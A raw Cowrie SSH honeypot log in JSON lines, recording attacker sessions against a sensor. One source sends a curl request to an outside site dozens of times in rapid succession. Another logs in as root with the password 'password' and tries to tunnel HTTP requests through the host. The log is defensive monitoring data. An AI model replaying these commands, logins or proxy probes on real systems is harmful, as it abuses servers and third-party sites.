{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.119288Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.155801Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.156714Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.194844Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.195751Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.232508Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.233440Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.270116Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.271034Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.307610Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.308566Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.346602Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.347486Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.394708Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.395605Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.432331Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.433949Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.471269Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.472138Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.508659Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.509660Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.549330Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.550522Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.588750Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.589882Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.628165Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.629145Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.666795Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.667787Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.704803Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.705749Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.746433Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.747453Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.797098Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.798246Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.838628Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.839802Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.879920Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.880979Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.937172Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.938288Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:23.974918Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:23.975872Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:24.013530Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:24.014646Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:24.055382Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:24.056547Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:24.093898Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:24.094941Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:24.134204Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:24.135357Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:24.171832Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:24.172817Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:24.229360Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:24.230346Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.connect","src_ip":"193.105.134.95","src_port":39904,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcc088d6e826","protocol":"ssh","message":"New connection: 193.105.134.95:39904 (1.2.3.4:22) [session: bcc088d6e826]","sensor":"my-vps","timestamp":"2025-08-28T07:40:24.257841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PuTTY_Release_0.67","message":"Remote SSH version: SSH-2.0-PuTTY_Release_0.67","sensor":"my-vps","timestamp":"2025-08-28T07:40:24.258729Z","src_ip":"193.105.134.95","session":"bcc088d6e826"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:24.266923Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:24.267735Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-28T07:40:24.303453Z","src_ip":"193.105.134.95","session":"bcc088d6e826"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:24.305017Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:24.305786Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:24.344634Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:24.345611Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:24.383313Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:24.384276Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:24.681643Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:24.682639Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:24.720206Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:24.721255Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.025250Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.026208Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.063176Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.064410Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.101965Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.102919Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.152184Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.153202Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.212373Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.213314Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.216171Z","src_ip":"193.105.134.95","session":"bcc088d6e826"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.249939Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.250876Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"193.105.134.95","src_port":27475,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:27475","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.261735Z","session":"bcc088d6e826"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.287459Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.288552Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.306562Z","src_ip":"193.105.134.95","session":"bcc088d6e826"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.326594Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.327648Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.364534Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.365605Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.403804Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.404689Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"193.105.134.95","src_port":27357,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:27357","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.439101Z","session":"bcc088d6e826"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.441508Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.442056Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.480539Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.481401Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.484204Z","src_ip":"193.105.134.95","session":"bcc088d6e826"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.525499Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.526372Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.576701Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.577853Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"193.105.134.95","src_port":17921,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:17921","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.615098Z","session":"bcc088d6e826"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.619888Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.620647Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.658000Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.658927Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.660363Z","src_ip":"193.105.134.95","session":"bcc088d6e826"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.695626Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.696497Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.735281Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.736282Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.783294Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.784603Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"193.105.134.95","src_port":24687,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:24687","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.794843Z","session":"bcc088d6e826"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:25.831059Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.832084Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T07:40:25.839716Z","src_ip":"193.105.134.95","session":"bcc088d6e826"}
